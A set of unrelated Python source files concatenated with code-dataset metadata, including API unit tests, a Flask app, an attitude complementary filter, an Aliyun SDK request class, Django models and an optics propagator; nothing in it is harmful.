self.assertEqual(self.shelf.location, 'NYC-9th') shelf = shelf_model.Shelf.get(friendly_name='GnG') self.assertEqual(shelf.location, 'NYC-9th') self.assertIsInstance(response, message_types.VoidMessage) @parameterized.parameters( (shelf_messages.Shelf(capacity=10), 2,), (shelf_messages.Shelf(enabled=False), 1,), (shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='enabled:True capacity:10')), 2,), (shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='enabled:False')), 1,)) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_list_shelves(self, request, response_length, mock_xsrf_token): response = self.service.list_shelves(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertEqual(response_length, len(response.shelves)) def test_list_shelves_invalid_page_size(self): with self.assertRaises(endpoints.BadRequestException): request = shelf_messages.Shelf(page_size=0) self.service.list_shelves(request) def test_list_shelves_with_search_constraints(self): expressions = shared_messages.SearchExpression(expression='location') expected_response = shelf_messages.ListShelfResponse( shelves=[shelf_messages.Shelf( location=self.shelf.location, shelf_request=shelf_messages.ShelfRequest( location=self.shelf.location, urlsafe_key=self.shelf.key.urlsafe()))], total_results=1, total_pages=1) request = shelf_messages.Shelf( query=shared_messages.SearchRequest( query_string='location:NYC', expressions=[expressions], returned_fields=['location'])) response = self.service.list_shelves(request) self.assertEqual(response, expected_response) def test_list_shelves_with_offset(self): previouse_shelf_locations = [] request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=1) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) previouse_shelf_locations.append(response.shelves[0].location) # Get next page results and make sure it's not the same as last. request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=2) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) self.assertNotIn(response.shelves[0], previouse_shelf_locations) previouse_shelf_locations.append(response.shelves[0].location) # Get next page results and make sure it's not the same as last 2. request = shelf_messages.Shelf(enabled=True, page_size=1, page_number=3) response = self.service.list_shelves(request) self.assertEqual(len(response.shelves), 1) self.assertNotIn(response.shelves[0], previouse_shelf_locations) previouse_shelf_locations.append(response.shelves[0].location) @mock.patch('__main__.root_api.Service.check_xsrf_token') @mock.patch('__main__.shelf_api.logging.info') def test_audit_using_shelf_location(self, mock_logging, mock_xsrf_token): request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), device_identifiers=self.device_identifiers) response = self.service.audit(request) self.assertEqual(mock_xsrf_token.call_count, 1) mock_logging.assert_called() for identifier in self.device_identifiers: datastore_device = device_model.Device.get(serial_number=identifier) self.assertEqual(datastore_device.shelf.get().location, 'NYC') self.assertFalse(self.shelf.audit_requested) self.assertEqual(self.shelf.last_audit_by, loanertest.SUPER_ADMIN_EMAIL) self.assertIsInstance(response, message_types.VoidMessage) def test_audit_invalid_device(self): request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), device_identifiers=['Invalid']) with self.assertRaisesRegexp( endpoints.NotFoundException, shelf_api._DEVICE_DOES_NOT_EXIST_MSG % 'Invalid'): self.service.audit(request) @mock.patch.object(device_model.Device, 'search') @mock.patch.object(shelf_api, 'get_shelf', autospec=True) def test_audit_remove_devices( self, mock_get_shelf, mock_model_device_search): shelf = self.device2_key.get() shelf.shelf = self.shelf.key shelf.put() mock_model_device_search.return_value = ( search.SearchResults( results=[ search.ScoredDocument( doc_id=self.device2_key.urlsafe()), search.ScoredDocument( doc_id=self.device3_key.urlsafe()), search.ScoredDocument( doc_id=self.device4_key.urlsafe())], number_found=3)) mock_get_shelf.return_value = self.shelf request = shelf_messages.ShelfAuditRequest( shelf_request=shelf_messages.ShelfRequest(location=self.shelf.location), device_identifiers=[self.device3_key.get().serial_number]) self.service.audit(request) self.assertEqual(self.device3_key.get().shelf, self.shelf.key) self.assertIsNone(self.device2_key.get().shelf) self.assertIsNone(self.device4_key.get().shelf) def test_get_shelf_urlsafe_key(self): """Test getting a shelf using the urlsafe key.""" request = shelf_messages.ShelfRequest(urlsafe_key=self.shelf.key.urlsafe()) shelf = shelf_api.get_shelf(request) self.assertEqual(shelf, self.shelf) def test_get_shelf_using_location(self): """Test getting a shelf using the location.""" request = shelf_messages.ShelfRequest(location=self.shelf.location) shelf = shelf_api.get_shelf(request) self.assertEqual(shelf, self.shelf) def test_get_shelf_using_location_error(self): """Test getting a shelf with an invalid location.""" request = shelf_messages.ShelfRequest(location='Not_Valid') with self.assertRaisesRegexp( endpoints.NotFoundException, shelf_api._SHELF_DOES_NOT_EXIST_MSG % request.location): shelf_api.get_shelf(request) if __name__ == '__main__': loanertest.main()
41.905085
86
0.729494
10,963
0.886831
0
0
4,270
0.345413
0
0
1,883
0.152322
beb9ee31926225eb2b3cd87871300007116d1d11
2,177
py
Python
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
1
2020-02-28T12:17:38.000Z
2020-02-28T12:17:38.000Z
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
1
2021-06-02T00:54:48.000Z
2021-06-02T00:54:48.000Z
app/views/main.py
ArmandDS/ai_bert_resumes
743f37049bbca67bcbbaf21a2ffecf0d093351df
[ "MIT" ]
null
null
null
from flask import render_template, jsonify, Flask, redirect, url_for, request from app import app import random import os # import tensorflow as tf # import numpy as np # import sys # import spacy # nlp = spacy.load('en') # sys.path.insert(0, "/content/bert_experimental") # from bert_experimental.finetuning.text_preprocessing import build_preprocessor # from bert_experimental.finetuning.graph_ops import load_graph # restored_graph = load_graph("models/frozen_graph.pb") # graph_ops = restored_graph.get_operations() # input_op, output_op = graph_ops[0].name, graph_ops[-1].name # x = restored_graph.get_tensor_by_name(input_op + ':0') # y = restored_graph.get_tensor_by_name(output_op + ':0') # preprocessor = build_preprocessor("./uncased_L-12_H-768_A-12/vocab.txt", 256) # py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32], name='preprocessor') # py_func = tf.numpy_function(preprocessor, [x], [tf.int32, tf.int32, tf.int32]) # sess = tf.Session(graph=restored_graph) # delimiter = " ||| " @app.route('/') def index1(): return render_template('index.html', title='Home') @app.route('/predict', methods = ['GET', 'POST']) def upload_file(): if request.method == 'POST': exp_st = request.form.get('exp') job_st = request.form.get('job') # y_out = sess.run(y, feed_dict={ # x: pd.DataFrame([delimiter.join((exp_st, job_st ))], columns=['name']) # }) # doc1 = nlp(exp_st) # doc2 = nlp(job_st ) # y_out2 = doc1.similarity(doc2) return render_template('index.html', title='Success', predictions=80, predictions_sp =75, exp=exp_st, job= job_st) @app.route('/index') def index(): return render_template('index.html', title='Home') @app.route('/map') def map(): return render_template('map.html', title='Map') @app.route('/map/refresh', methods=['POST']) def map_refresh(): points = [(random.uniform(48.8434100, 48.8634100), random.uniform(2.3388000, 2.3588000)) for _ in range(random.randint(2, 9))] return jsonify({'points': points}) @app.route('/contact') def contact(): return render_template('contact.html', title='Contact')
33.492308
117
0.686266
0
0
0
0
1,134
0.5209
0
0
1,255
0.576481
bebb042aa5530a31d011f0dddb5b720502bac701
11,710
py
Python
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
ahrs/filters/complementary.py
jaluebbe/ahrs
4b4a33b1006e0d455a71ac8379a2697202361758
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Complementary Filter ==================== Attitude quaternion obtained with gyroscope and accelerometer-magnetometer measurements, via complementary filter. First, the current orientation is estimated at time :math:`t`, from a previous orientation at time :math:`t-1`, and a given angular velocity, :math:`\\omega`, in rad/s. This orientation is computed by numerically integrating the angular velocity and adding it to the previous orientation, which is known as an **attitude propagation**. .. math:: \\begin{array}{rcl} \\mathbf{q}_\\omega &=& \\Big(\\mathbf{I}_4 + \\frac{\\Delta t}{2}\\boldsymbol\\Omega_t\\Big)\\mathbf{q}_{t-1} \\\\ &=& \\begin{bmatrix} 1 & -\\frac{\\Delta t}{2}\\omega_x & -\\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z \\\\ \\frac{\\Delta t}{2}\\omega_x & 1 & \\frac{\\Delta t}{2}\\omega_z & -\\frac{\\Delta t}{2}\\omega_y \\\\ \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_z & 1 & \\frac{\\Delta t}{2}\\omega_x \\\\ \\frac{\\Delta t}{2}\\omega_z & \\frac{\\Delta t}{2}\\omega_y & -\\frac{\\Delta t}{2}\\omega_x & 1 \\end{bmatrix} \\begin{bmatrix}q_w \\\\ q_x \\\\ q_y \\\\ q_z \\end{bmatrix} \\\\ &=& \\begin{bmatrix} q_w - \\frac{\\Delta t}{2} \\omega_x q_x - \\frac{\\Delta t}{2} \\omega_y q_y - \\frac{\\Delta t}{2} \\omega_z q_z\\\\ q_x + \\frac{\\Delta t}{2} \\omega_x q_w - \\frac{\\Delta t}{2} \\omega_y q_z + \\frac{\\Delta t}{2} \\omega_z q_y\\\\ q_y + \\frac{\\Delta t}{2} \\omega_x q_z + \\frac{\\Delta t}{2} \\omega_y q_w - \\frac{\\Delta t}{2} \\omega_z q_x\\\\ q_z - \\frac{\\Delta t}{2} \\omega_x q_y + \\frac{\\Delta t}{2} \\omega_y q_x + \\frac{\\Delta t}{2} \\omega_z q_w \\end{bmatrix} \\end{array} Secondly, the *tilt* is computed from the accelerometer measurements as: .. math:: \\begin{array}{rcl} \\theta &=& \\mathrm{arctan2}(a_y, a_z) \\\\ \\phi &=& \\mathrm{arctan2}\\big(-a_x, \\sqrt{a_y^2+a_z^2}\\big) \\end{array} Only the pitch, :math:`\\phi`, and roll, :math:`\\theta`, angles are computed, leaving the yaw angle, :math:`\\psi` equal to zero. If a magnetometer sample is available, the yaw angle can be computed. First compensate the measurement using the *tilt*: .. math:: \\begin{array}{rcl} \\mathbf{b} &=& \\begin{bmatrix} \\cos\\theta & \\sin\\theta\\sin\\phi & \\sin\\theta\\cos\\phi \\\\ 0 & \\cos\\phi & -\\sin\\phi \\\\ -\\sin\\theta & \\cos\\theta\\sin\\phi & \\cos\\theta\\cos\\phi \\end{bmatrix} \\begin{bmatrix}m_x \\\\ m_y \\\\ m_z\\end{bmatrix} \\\\ \\begin{bmatrix}b_x \\\\ b_y \\\\ b_z\\end{bmatrix} &=& \\begin{bmatrix} m_x\\cos\\theta + m_y\\sin\\theta\\sin\\phi + m_z\\sin\\theta\\cos\\phi \\\\ m_y\\cos\\phi - m_z\\sin\\phi \\\\ -m_x\\sin\\theta + m_y\\cos\\theta\\sin\\phi + m_z\\cos\\theta\\cos\\phi \\end{bmatrix} \\end{array} Then, the yaw angle, :math:`\\psi`, is obtained as: .. math:: \\begin{array}{rcl} \\psi &=& \\mathrm{arctan2}(-b_y, b_x) \\\\ &=& \\mathrm{arctan2}\\big(m_z\\sin\\phi - m_y\\cos\\phi, \\; m_x\\cos\\theta + \\sin\\theta(m_y\\sin\\phi + m_z\\cos\\phi)\\big) \\end{array} We transform the roll-pitch-yaw angles to a quaternion representation: .. math:: \\mathbf{q}_{am} = \\begin{pmatrix}q_w\\\\q_x\\\\q_y\\\\q_z\\end{pmatrix} = \\begin{pmatrix} \\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) - \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\cos\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) + \\sin\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) \\\\ \\cos\\Big(\\frac{\\phi}{2}\\Big)\\cos\\Big(\\frac{\\theta}{2}\\Big)\\sin\\Big(\\frac{\\psi}{2}\\Big) - \\sin\\Big(\\frac{\\phi}{2}\\Big)\\sin\\Big(\\frac{\\theta}{2}\\Big)\\cos\\Big(\\frac{\\psi}{2}\\Big) \\end{pmatrix} Finally, after each orientation is estimated independently, they are fused with the complementary filter. .. math:: \\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am} where :math:`\\mathbf{q}_\\omega` is the attitude estimated from the gyroscope, :math:`\\mathbf{q}_{am}` is the attitude estimated from the accelerometer and the magnetometer, and :math:`\\alpha` is the gain of the filter. The filter gain must be a floating value within the range :math:`[0.0, 1.0]`. It can be seen that when :math:`\\alpha=1`, the attitude is estimated entirely with the accelerometer and the magnetometer. When :math:`\\alpha=0`, it is estimated solely with the gyroscope. The values within the range decide how much of each estimation is "blended" into the quaternion. This is actually a simple implementation of `LERP <https://en.wikipedia.org/wiki/Linear_interpolation>`_ commonly used to linearly interpolate quaternions with small differences between them. """ import numpy as np from ..common.orientation import ecompass class Complementary: """ Complementary filter for attitude estimation as quaternion. Parameters ---------- gyr : numpy.ndarray, default: None N-by-3 array with measurements of angular velocity, in rad/s. acc : numpy.ndarray, default: None N-by-3 array with measurements of acceleration, in m/s^2. mag : numpy.ndarray, default: None N-by-3 array with measurements of magnetic field, in mT. frequency : float, default: 100.0 Sampling frequency in Herz. Dt : float, default: 0.01 Sampling step in seconds. Inverse of sampling frequency. Not required if ``frequency`` value is given. gain : float, default: 0.1 Filter gain. q0 : numpy.ndarray, default: None Initial orientation, as a versor (normalized quaternion). Raises ------ ValueError When dimension of input arrays ``acc``, ``gyr``, or ``mag`` are not equal. """ def __init__(self, gyr: np.ndarray = None, acc: np.ndarray = None, mag: np.ndarray = None, frequency: float = 100.0, gain = 0.9, **kwargs): self.gyr: np.ndarray = gyr self.acc: np.ndarray = acc self.mag: np.ndarray = mag self.frequency: float = frequency self.gain: float = gain if not(0.0 <= self.gain <= 1.0): raise ValueError(f"Filter gain must be in the range [0, 1]. Got {self.gain}") self.Dt: float = kwargs.get('Dt', 1.0/self.frequency) self.q0: np.ndarray = kwargs.get('q0') # Process of given data if self.gyr is not None and self.acc is not None: self.Q = self._compute_all() def _compute_all(self) -> np.ndarray: """ Estimate the quaternions given all data Attributes ``gyr``, ``acc`` and, optionally, ``mag`` must contain data. Returns ------- Q : numpy.ndarray M-by-4 Array with all estimated quaternions, where M is the number of samples. """ if self.acc.shape != self.gyr.shape: raise ValueError("acc and gyr are not the same size") num_samples = len(self.acc) Q = np.zeros((num_samples, 4)) if self.mag is None: self.mag = [None]*num_samples else: if self.mag.shape != self.gyr.shape: raise ValueError("mag and gyr are not the same size") Q[0] = self.am_estimation(self.acc[0], self.mag[0]) if self.q0 is None else self.q0.copy() for t in range(1, num_samples): Q[t] = self.update(Q[t-1], self.gyr[t], self.acc[t], self.mag[t]) return Q def attitude_propagation(self, q: np.ndarray, omega: np.ndarray, dt: float) -> np.ndarray: """ Attitude propagation of the orientation. Estimate the current orientation at time :math:`t`, from a given orientation at time :math:`t-1` and a given angular velocity, :math:`\\omega`, in rad/s. It is computed by numerically integrating the angular velocity and adding it to the previous orientation. Parameters ---------- q : numpy.ndarray A-priori quaternion. omega : numpy.ndarray Tri-axial angular velocity, in rad/s. dt : float Time step, in seconds, between consecutive Quaternions. Returns ------- q_omega : numpy.ndarray Estimated orientation, as quaternion. """ w = -0.5*dt*omega A = np.array([ [1.0, -w[0], -w[1], -w[2]], [w[0], 1.0, w[2], -w[1]], [w[1], -w[2], 1.0, w[0]], [w[2], w[1], -w[0], 1.0]]) q_omega = A @ q return q_omega / np.linalg.norm(q_omega) def am_estimation(self, acc: np.ndarray, mag: np.ndarray = None) -> np.ndarray: """ Attitude estimation from an Accelerometer-Magnetometer architecture. Parameters ---------- acc : numpy.ndarray Tri-axial sample of the accelerometer. mag : numpy.ndarray, default: None Tri-axial sample of the magnetometer. Returns ------- q_am : numpy.ndarray Estimated attitude. """ return ecompass(acc, mag, frame='NED', representation='quaternion') def update(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray = None, dt: float = None) -> np.ndarray: """ Attitude Estimation from given measurements and previous orientation. The new orientation is first estimated with the angular velocity, then another orientation is computed using the accelerometers and magnetometers. The magnetometer is optional. Each orientation is estimated independently and fused with a complementary filter. .. math:: \\mathbf{q} = (1 - \\alpha) \\mathbf{q}_\\omega + \\alpha\\mathbf{q}_{am} Parameters ---------- q : numpy.ndarray A-priori quaternion. gyr : numpy.ndarray Sample of tri-axial Gyroscope in rad/s. acc : numpy.ndarray Sample of tri-axial Accelerometer in m/s^2. mag : numpy.ndarray, default: None Sample of tri-axial Magnetometer in uT. dt : float, default: None Time step, in seconds, between consecutive Quaternions. Returns ------- q : numpy.ndarray Estimated quaternion. """ dt = self.Dt if dt is None else dt if gyr is None or not np.linalg.norm(gyr) > 0: return q q_omega = self.attitude_propagation(q, gyr, dt) q_am = self.am_estimation(acc, mag) # Complementary Estimation if np.linalg.norm(q_omega + q_am) < np.sqrt(2): q = (1.0 - self.gain)*q_omega - self.gain*q_am else: q = (1.0 - self.gain)*q_omega + self.gain*q_am return q/np.linalg.norm(q)
41.232394
219
0.566695
6,217
0.530914
0
0
0
0
0
0
9,159
0.782152
bebb3991fe53855d056c3141b393c1defb50e7e5
4,197
py
Python
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
1,001
2015-07-24T01:32:41.000Z
2022-03-25T01:28:18.000Z
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
363
2015-10-20T03:15:00.000Z
2022-03-08T12:26:19.000Z
aliyun-python-sdk-ehpc/aliyunsdkehpc/request/v20180412/EditJobTemplateRequest.py
yndu13/aliyun-openapi-python-sdk
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
[ "Apache-2.0" ]
682
2015-09-22T07:19:02.000Z
2022-03-22T09:51:46.000Z
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from aliyunsdkcore.request import RpcRequest from aliyunsdkehpc.endpoint import endpoint_data class EditJobTemplateRequest(RpcRequest): def __init__(self): RpcRequest.__init__(self, 'EHPC', '2018-04-12', 'EditJobTemplate') self.set_method('GET') if hasattr(self, "endpoint_map"): setattr(self, "endpoint_map", endpoint_data.getEndpointMap()) if hasattr(self, "endpoint_regional"): setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional()) def get_StderrRedirectPath(self): return self.get_query_params().get('StderrRedirectPath') def set_StderrRedirectPath(self,StderrRedirectPath): self.add_query_param('StderrRedirectPath',StderrRedirectPath) def get_ClockTime(self): return self.get_query_params().get('ClockTime') def set_ClockTime(self,ClockTime): self.add_query_param('ClockTime',ClockTime) def get_CommandLine(self): return self.get_query_params().get('CommandLine') def set_CommandLine(self,CommandLine): self.add_query_param('CommandLine',CommandLine) def get_ArrayRequest(self): return self.get_query_params().get('ArrayRequest') def set_ArrayRequest(self,ArrayRequest): self.add_query_param('ArrayRequest',ArrayRequest) def get_PackagePath(self): return self.get_query_params().get('PackagePath') def set_PackagePath(self,PackagePath): self.add_query_param('PackagePath',PackagePath) def get_Mem(self): return self.get_query_params().get('Mem') def set_Mem(self,Mem): self.add_query_param('Mem',Mem) def get_StdoutRedirectPath(self): return self.get_query_params().get('StdoutRedirectPath') def set_StdoutRedirectPath(self,StdoutRedirectPath): self.add_query_param('StdoutRedirectPath',StdoutRedirectPath) def get_Variables(self): return self.get_query_params().get('Variables') def set_Variables(self,Variables): self.add_query_param('Variables',Variables) def get_RunasUser(self): return self.get_query_params().get('RunasUser') def set_RunasUser(self,RunasUser): self.add_query_param('RunasUser',RunasUser) def get_ReRunable(self): return self.get_query_params().get('ReRunable') def set_ReRunable(self,ReRunable): self.add_query_param('ReRunable',ReRunable) def get_Thread(self): return self.get_query_params().get('Thread') def set_Thread(self,Thread): self.add_query_param('Thread',Thread) def get_TemplateId(self): return self.get_query_params().get('TemplateId') def set_TemplateId(self,TemplateId): self.add_query_param('TemplateId',TemplateId) def get_Priority(self): return self.get_query_params().get('Priority') def set_Priority(self,Priority): self.add_query_param('Priority',Priority) def get_Gpu(self): return self.get_query_params().get('Gpu') def set_Gpu(self,Gpu): self.add_query_param('Gpu',Gpu) def get_Node(self): return self.get_query_params().get('Node') def set_Node(self,Node): self.add_query_param('Node',Node) def get_Task(self): return self.get_query_params().get('Task') def set_Task(self,Task): self.add_query_param('Task',Task) def get_Name(self): return self.get_query_params().get('Name') def set_Name(self,Name): self.add_query_param('Name',Name) def get_Queue(self): return self.get_query_params().get('Queue') def set_Queue(self,Queue): self.add_query_param('Queue',Queue)
29.978571
74
0.751013
3,310
0.788659
0
0
0
0
0
0
1,257
0.2995
bebb7eff935771339795abf6b86ab3ed10b32cc3
3,550
py
Python
tests/common/models/test_execution.py
angry-tony/ceph-lcm-decapod
535944d3ee384c3a7c4af82f74041b0a7792433f
[ "Apache-2.0" ]
41
2016-11-03T16:40:17.000Z
2019-05-23T08:39:17.000Z
tests/common/models/test_execution.py
Mirantis/ceph-lcm
fad9bad0b94f2ef608362953583b10a54a841d24
[ "Apache-2.0" ]
30
2016-10-14T10:54:46.000Z
2017-10-20T15:58:01.000Z
tests/common/models/test_execution.py
angry-tony/ceph-lcm-decapod
535944d3ee384c3a7c4af82f74041b0a7792433f
[ "Apache-2.0" ]
28
2016-09-17T01:17:36.000Z
2019-07-05T03:32:54.000Z
# -*- coding: utf-8 -*- # Copyright (c) 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for decapod_common.models.execution.""" import pytest from decapod_common.models import execution def test_create(new_execution, new_pcmodel, pymongo_connection): db_model = pymongo_connection.db.execution.find_one( {"_id": new_execution._id} ) assert db_model assert new_execution.model_id == db_model["model_id"] assert new_execution.version == db_model["version"] assert new_execution.time_created == db_model["time_created"] assert new_execution.time_deleted == db_model["time_deleted"] assert new_execution.initiator_id == db_model["initiator_id"] assert new_execution.playbook_configuration_model_id == \ db_model["pc_model_id"] assert new_execution.playbook_configuration_version == \ db_model["pc_version"] assert new_execution.state.name == db_model["state"] assert new_execution.state == execution.ExecutionState.created assert new_execution.playbook_configuration_model_id == \ new_pcmodel.model_id assert new_execution.playbook_configuration_version == \ new_pcmodel.version @pytest.mark.parametrize("state", execution.ExecutionState) def test_change_state_ok(state, new_execution): new_execution.state = state new_execution.save() assert new_execution.state == state @pytest.mark.parametrize("state", ( "", "changed", "started", 0, None, -1.0, [], {}, object(), set() )) def test_change_state_fail(state, new_execution): with pytest.raises(ValueError): new_execution.state = state @pytest.mark.parametrize("state", execution.ExecutionState) def test_api_response(state, new_pcmodel, new_execution): new_execution.state = state new_execution.save() assert new_execution.make_api_structure() == { "id": new_execution.model_id, "initiator_id": new_execution.initiator_id, "time_deleted": new_execution.time_deleted, "time_updated": new_execution.time_created, "model": execution.ExecutionModel.MODEL_NAME, "version": 2, "data": { "playbook_configuration": { "id": new_pcmodel.model_id, "version": new_pcmodel.version, "playbook_name": new_pcmodel.playbook_id }, "state": state.name } } def test_getting_logfile(new_execution, execution_log_storage): new_execution.logfile execution_log_storage.get.assert_called_once_with(new_execution.model_id) def test_create_logfile(new_execution, execution_log_storage): new_execution.new_logfile.write("1") execution_log_storage.delete.assert_called_once_with( new_execution.model_id ) execution_log_storage.new_file.assert_called_once_with( new_execution.model_id, filename="{0}.log".format(new_execution.model_id), content_type="text/plain" ) execution_log_storage.new_file().write.assert_called_once_with("1")
33.809524
77
0.719155
0
0
0
0
1,200
0.338028
0
0
932
0.262535
bebc4c58538a85c2ad00b34ebacde9538e3d0d9b
1,613
py
Python
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
null
null
null
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
null
null
null
board/models.py
Fahreeve/TaskManager
7f0a16312b43867270eaade1fe153c07abc2c10e
[ "MIT" ]
1
2020-09-15T09:15:13.000Z
2020-09-15T09:15:13.000Z
from django.contrib.auth.models import User from django.core.validators import MaxValueValidator, MinValueValidator from django.db import models from django.utils.translation import ugettext_lazy as _ class Task(models.Model): CLOSE = 'cl' CANCEL = 'ca' LATER = 'la' UNDEFINED = 'un' CHOICES = ( (UNDEFINED, _("Неизвестно")), (CLOSE, _("Завершить")), (CANCEL, _("Отменить")), (LATER, _("Отложить")), ) title = models.CharField(_("Заголовок"), max_length=50) description = models.TextField(_("Описание")) executor = models.ForeignKey(User, verbose_name=_("Исполнитель"), on_delete=models.CASCADE) status = models.CharField(_("Статус"), choices=CHOICES, default=UNDEFINED, max_length=2) deadline = models.DateTimeField(_("Дедлайн")) priority = models.IntegerField(_("Приоритет"), default=1, validators=[MinValueValidator(1), MaxValueValidator(3)]) changed = models.DateTimeField(_("Дата последнего изменения"), auto_now=True) created = models.DateTimeField(_("Дата создания"), auto_now_add=True) @property def text_status(self): choices = dict(self.CHOICES) return choices[self.status] @property def text_deadline(self): return self.deadline.strftime("%d.%m.%Y %H:%M") class Comment(models.Model): task = models.ForeignKey(Task, related_name="comments", on_delete=models.CASCADE) creator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True) text = models.TextField(_('Комментарий')) created = models.DateTimeField(_("Дата создания"), auto_now_add=True)
37.511628
118
0.695598
1,549
0.882118
0
0
203
0.115604
0
0
360
0.205011
bebe436d87bb3f3a76cbb71e91dc6e70bb5b2e46
475
py
Python
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
72
2017-08-30T03:02:51.000Z
2022-03-11T23:15:15.000Z
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
10
2019-03-14T08:04:33.000Z
2021-08-10T09:36:45.000Z
test/test_hex_line.py
bicobus/Hexy
e75d58e66546c278fb648af85e3f9dae53127826
[ "MIT" ]
15
2017-11-08T05:37:06.000Z
2021-08-05T19:16:48.000Z
import numpy as np import hexy as hx def test_get_hex_line(): expected = [ [-3, 3, 0], [-2, 2, 0], [-1, 2, -1], [0, 2, -2], [1, 1, -2], ] start = np.array([-3, 3, 0]) end = np.array([1, 1, -2]) print(hx.get_hex_line(start, end)) print(expected); assert(np.array_equal( hx.get_hex_line(start, end), expected)); if __name__ == "__main__": test_get_hex_line()
21.590909
38
0.471579
0
0
0
0
0
0
0
0
10
0.021053
bebe5670df71295bc98ec96c4bde4a3c31d4fb66
6,747
py
Python
wofry/propagator/propagators2D/integral.py
PaNOSC-ViNYL/wofry
779b5a738ee7738e959a58aafe01e7e49b03894a
[ "MIT" ]
null
null
null
wofry/propagator/propagators2D/integral.py
PaNOSC-ViNYL/wofry
779b5a738ee7738e959a58aafe01e7e49b03894a
[ "MIT" ]
1
2021-02-16T12:12:10.000Z
2021-02-16T12:12:10.000Z
wofryimpl/propagator/propagators2D/integral.py
oasys-kit/wofryimpl
f300b714b038110987783c40d2c3af8dca7e54eb
[ "MIT" ]
null
null
null
# propagate_2D_integral: Simplification of the Kirchhoff-Fresnel integral. TODO: Very slow and give some problems import numpy from wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D from wofry.propagator.propagator import Propagator2D # TODO: check resulting amplitude normalization (fft and srw likely agree, convolution gives too high amplitudes, so needs normalization) class Integral2D(Propagator2D): HANDLER_NAME = "INTEGRAL_2D" def get_handler_name(self): return self.HANDLER_NAME def do_specific_progation_after(self, wavefront, propagation_distance, parameters, element_index=None): return self.do_specific_progation(wavefront, propagation_distance, parameters, element_index=element_index) def do_specific_progation_before(self, wavefront, propagation_distance, parameters, element_index=None): return self.do_specific_progation( wavefront, propagation_distance, parameters, element_index=element_index) """ 2D Fresnel-Kirchhoff propagator via simplified integral NOTE: this propagator is experimental and much less performant than the ones using Fourier Optics Therefore, it is not recommended to use. :param wavefront: :param propagation_distance: propagation distance :param shuffle_interval: it is known that this method replicates the central diffraction spot The distace of the replica is proportional to 1/pixelsize To avoid that, it is possible to change a bit (randomly) the coordinates of the wavefront. shuffle_interval controls this shift: 0=No shift. A typical value can be 